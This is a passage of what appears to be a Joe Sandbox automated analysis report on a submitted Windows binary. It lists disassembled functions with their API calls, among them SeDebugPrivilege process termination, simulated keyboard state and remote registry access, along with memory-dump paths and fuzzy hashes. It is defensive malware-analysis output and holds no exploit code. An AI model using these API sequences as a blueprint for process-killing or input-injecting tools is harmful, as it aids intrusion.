                                                                        • GetLastError.KERNEL32(00000000), ref: 00ED1860
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00ED1895
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                        • String ID: SeDebugPrivilege
                                                                        • API String ID: 2533919879-2896544425
                                                                        • Opcode ID: bd5f1bf42a2be21745ceaf95e6c94011a1c00a7d1a0b1d3640785fa6b46acdf0
                                                                        • Instruction ID: 9349c8d1a45eb5d7e92645d2b6821c89bca2b461c7ef92295ace866bcbcd168f
                                                                        • Opcode Fuzzy Hash: bd5f1bf42a2be21745ceaf95e6c94011a1c00a7d1a0b1d3640785fa6b46acdf0
                                                                        • Instruction Fuzzy Hash: 1E417B75600200AFDB15EF54CC95FBEB7E2AF54304F049099FA0AAB392DB74A905DB51
                                                                        Function 00EB5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00EB58B8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoad
                                                                        • String ID: blank$info$question$stop$warning
                                                                        • API String ID: 2457776203-404129466
                                                                        • Opcode ID: 751bbc024a08270900081e0317144a020a78f5f9ab37f509c1c48ab4a702ac95
                                                                        • Instruction ID: 840eb90458ce6e5568e8452357ab84f3a71dac7e372c6e6005a6dce48b9720ab
                                                                        • Opcode Fuzzy Hash: 751bbc024a08270900081e0317144a020a78f5f9ab37f509c1c48ab4a702ac95
                                                                        • Instruction Fuzzy Hash: BE11E77370D756BEEB095B54AC82EEB37DD9F15324B20103AF500B62C1E7B4AA405665
                                                                        Function 00EBA729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00EBA806
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafeVartype
                                                                        • String ID:
                                                                        • API String ID: 1725837607-0
                                                                        • Opcode ID: 4f5152b7965ad7e030d1ceb8e2a4b99f2c92f85fe10bbe4141ee25e3b7657524
                                                                        • Instruction ID: 6497a24693deefb1f4cfb16836e417c9d7e7198d5cd4d3271804ddad474543c6
                                                                        • Opcode Fuzzy Hash: 4f5152b7965ad7e030d1ceb8e2a4b99f2c92f85fe10bbe4141ee25e3b7657524
                                                                        • Instruction Fuzzy Hash: 70C16871A0421A9FDF04DF98D485BEEB7F4EF08314F28506AE615F7241D734AA45CBA1
                                                                        Function 00EB6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00EB6B63
                                                                        • LoadStringW.USER32(00000000), ref: 00EB6B6A
                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00EB6B80
                                                                        • LoadStringW.USER32(00000000), ref: 00EB6B87
                                                                        • _wprintf.LIBCMT ref: 00EB6BAD
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EB6BCB
                                                                        Strings
                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00EB6BA8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                        • API String ID: 3648134473-3128320259
                                                                        • Opcode ID: c44e49a3f401db6e3ffc985565f06016171e0cd07eec4d1138a81b45df374b6b
                                                                        • Instruction ID: eaeab0d621a4fa31738fd99d1f90445bf24ca6c3266da9220a4ad4cf1eacec71
                                                                        • Opcode Fuzzy Hash: c44e49a3f401db6e3ffc985565f06016171e0cd07eec4d1138a81b45df374b6b
                                                                        • Instruction Fuzzy Hash: 760131F6904218BFEB11ABA59D89EFB7B6CD708304F0044A1B746F2041EA74DE889F75
                                                                        Function 00ED2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00ED3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00ED2BB5,?,?), ref: 00ED3C1D
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ED2BF6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharConnectRegistryUpper
                                                                        • String ID:
                                                                        • API String ID: 2595220575-0
                                                                        • Opcode ID: 7f508580105e6aed8fa8c243a983ebee6cb34d991de491d96b0131d30f5ed022
                                                                        • Instruction ID: f4f6f30531d03d082e204a56f7caf8c74c5615dc8b93cb7a6714951be599c18b
                                                                        • Opcode Fuzzy Hash: 7f508580105e6aed8fa8c243a983ebee6cb34d991de491d96b0131d30f5ed022
                                                                        • Instruction Fuzzy Hash: EE917F712082019FC710EF14C891B6EB7E6FF94314F14985EFA9AA73A1DB34E906CB42
                                                                        Function 00EC961C Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • select.WSOCK32 ref: 00EC9691
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EC969E
                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00EC96C8
                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00EC96E9
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EC96F8
                                                                        • inet_ntoa.WSOCK32(?), ref: 00EC9765
                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00EC97AA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$htonsinet_ntoaselect
                                                                        • String ID:
                                                                        • API String ID: 500251541-0
                                                                        • Opcode ID: a40535c500d1bea651d9e62b274d88b303341d8c597c753438f1dcaf77ab9140
                                                                        • Instruction ID: 6abd7b74ae374ff6f85b48fe02203810421d5c19a80cb644441d5900e88bb580
                                                                        • Opcode Fuzzy Hash: a40535c500d1bea651d9e62b274d88b303341d8c597c753438f1dcaf77ab9140
                                                                        • Instruction Fuzzy Hash: 9471CC32508200AFC714EF64CC85F6BB7E9EF85714F105A1DF559AB1A2EB31D906CB92
                                                                        Function 00E9A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __mtinitlocknum.LIBCMT ref: 00E9A991
                                                                          • Part of subcall function 00E97D7C: __FF_MSGBANNER.LIBCMT ref: 00E97D91
                                                                          • Part of subcall function 00E97D7C: __NMSG_WRITE.LIBCMT ref: 00E97D98
                                                                          • Part of subcall function 00E97D7C: __malloc_crt.LIBCMT ref: 00E97DB8
                                                                        • __lock.LIBCMT ref: 00E9A9A4
                                                                        • __lock.LIBCMT ref: 00E9A9F0
                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00F26DE0,00000018,00EA5E7B,?,00000000,00000109), ref: 00E9AA0C
                                                                        • EnterCriticalSection.KERNEL32(8000000C,00F26DE0,00000018,00EA5E7B,?,00000000,00000109), ref: 00E9AA29
                                                                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 00E9AA39
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                        • String ID:
                                                                        • API String ID: 1422805418-0
                                                                        • Opcode ID: 97953c60e809a79773fdac2fb6a587d192367f3eec4cf3e673af396f66fe5b2a
                                                                        • Instruction ID: ab263b86cdb7bb02b8a17a8d7c80391ccd61856d60845d2675e776d93046d860
                                                                        • Opcode Fuzzy Hash: 97953c60e809a79773fdac2fb6a587d192367f3eec4cf3e673af396f66fe5b2a
                                                                        • Instruction Fuzzy Hash: 2D41F471A012059BEF14DF68DA4479CBBB0AF05339F199329E425BB2D1DBB49940CBD2
                                                                        Function 00ED8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DeleteObject.GDI32(00000000), ref: 00ED8EE4
                                                                        • GetDC.USER32(00000000), ref: 00ED8EEC
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ED8EF7
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00ED8F03
                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00ED8F3F
                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00ED8F50
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EDBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00ED8F8A
                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00ED8FAA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 3864802216-0
                                                                        • Opcode ID: 9131de256366648cf142de9f3d84ad60348bcc8c833f29299dfa76d9dcbfc091
                                                                        • Instruction ID: c64d3c8b12870eed504bd79927e6923a0964703c24a01a43ef9a61cce3796115
                                                                        • Opcode Fuzzy Hash: 9131de256366648cf142de9f3d84ad60348bcc8c833f29299dfa76d9dcbfc091
                                                                        • Instruction Fuzzy Hash: 86315C72204214BFEB118F51CC49FAA3FAAEF89715F054065FE09EA291CA759842CB74
                                                                        Function 00EC16DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                          • Part of subcall function 00E8C6F4: _wcscpy.LIBCMT ref: 00E8C717
                                                                        • _wcstok.LIBCMT ref: 00EC184E
                                                                        • _wcscpy.LIBCMT ref: 00EC18DD
                                                                        • _memset.LIBCMT ref: 00EC1910
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                        • String ID: X
                                                                        • API String ID: 774024439-3081909835
                                                                        • Opcode ID: cb252e5da088ee24d591fc64c854a3673e67185437ba20f5f17d492dc7b28dba
                                                                        • Instruction ID: 8ed662d422bb95e4939c4b21f7a5367df61b7a2124319974b738f8bf3a25d2d6
                                                                        • Opcode Fuzzy Hash: cb252e5da088ee24d591fc64c854a3673e67185437ba20f5f17d492dc7b28dba
                                                                        • Instruction Fuzzy Hash: 7DC180715083409FC724EF24C951E9AB7E4FF86354F00996DF499A72A2DB31ED06CB82
                                                                        Function 00EE0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00EE016D
                                                                        • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00EE038D
                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00EE03AB
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00EE03D6
                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00EE03FF
                                                                        • ShowWindow.USER32(00000003,00000000), ref: 00EE0421
                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00EE0440
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                        • String ID:
                                                                        • API String ID: 3356174886-0
                                                                        • Opcode ID: 5a8e6eeb8f5b0747f76acd3cb880e7629b2ef84829699856f86805778cc9a0d2
                                                                        • Instruction ID: 2c5e6258f01fc3541a98cf97df424eb47e6abea0ded4c2564b253787c598da49
                                                                        • Opcode Fuzzy Hash: 5a8e6eeb8f5b0747f76acd3cb880e7629b2ef84829699856f86805778cc9a0d2
                                                                        • Instruction Fuzzy Hash: C7A1CD3060065AEFDB18CF69C9897BDBBB2FF48714F049115EC54AB290E7B0AD90CB90
                                                                        Function 00E8AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0deb552d632e53a089b0f3d73c709e1f09eaa834ccf81ed9d7341dda0d284df4
                                                                        • Instruction ID: 7502a7c72f1b673cb28e160c13aa22f704b79e71e440f5f513232eb8d9595280
                                                                        • Opcode Fuzzy Hash: 0deb552d632e53a089b0f3d73c709e1f09eaa834ccf81ed9d7341dda0d284df4
                                                                        • Instruction Fuzzy Hash: 4F717D70A04109EFDB14DF99CC49ABEBB79FF89314F148159FA19B6250C734AA41CF61
                                                                        Function 00ED2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00ED225A
                                                                        • _memset.LIBCMT ref: 00ED2323
                                                                        • ShellExecuteExW.SHELL32(?), ref: 00ED2368
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                          • Part of subcall function 00E8C6F4: _wcscpy.LIBCMT ref: 00E8C717
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00ED242F
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00ED243E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                        • String ID: @
                                                                        • API String ID: 4082843840-2766056989
                                                                        • Opcode ID: 17cf1199f8bccf6407f702c348704ac02e69ec8f7f7b626e60b6b8074390bd00
                                                                        • Instruction ID: 09d8e04008421a148f32865227ecf5af1dc6eb6c18ade942bf0445b5af94c6ab
                                                                        • Opcode Fuzzy Hash: 17cf1199f8bccf6407f702c348704ac02e69ec8f7f7b626e60b6b8074390bd00
                                                                        • Instruction Fuzzy Hash: 65715B70A006199FCF05EFA4C9819AEBBF5FF48310F10945AE959BB391CB34AE41CB90
                                                                        Function 00EB3DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 00EB3DE7
                                                                        • GetKeyboardState.USER32(?), ref: 00EB3DFC
                                                                        • SetKeyboardState.USER32(?), ref: 00EB3E5D
                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00EB3E8B
                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00EB3EAA
                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00EB3EF0
                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00EB3F13
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: cab1fee00add6011bd3b0ce3de0e122a4442a30d6aa7f32a01a596a996a7efd5
                                                                        • Instruction ID: eb7341684f372bc70558aec1c97d1e861ca67e3d73a82275d6f78a7466e230f6
                                                                        • Opcode Fuzzy Hash: cab1fee00add6011bd3b0ce3de0e122a4442a30d6aa7f32a01a596a996a7efd5
                                                                        • Instruction Fuzzy Hash: 0D51D3A0A047D53DFB3647388C46BF77EA95B06308F085589E1D5668C3D794DEC8D760
                                                                        Function 00EB3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetParent.USER32(00000000), ref: 00EB3C02
                                                                        • GetKeyboardState.USER32(?), ref: 00EB3C17
                                                                        • SetKeyboardState.USER32(?), ref: 00EB3C78
                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00EB3CA4
                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00EB3CC1
                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00EB3D05
                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00EB3D26
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: 6a5e44f3d1d1d7fa5fd231335af18f89c989768bb98a6a89f6d4e5fbdd94785f
                                                                        • Instruction ID: 399b807f6fd44d99e09e4c767bc05eba0cf0b3f3f18e508d53560f4bc7533878
                                                                        • Opcode Fuzzy Hash: 6a5e44f3d1d1d7fa5fd231335af18f89c989768bb98a6a89f6d4e5fbdd94785f
                                                                        • Instruction Fuzzy Hash: 1E5103A05087D53DFB3683748C47BF7BE996B06308F089588E1D57A8C3D694EE88E760
                                                                        Function 00EB7DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
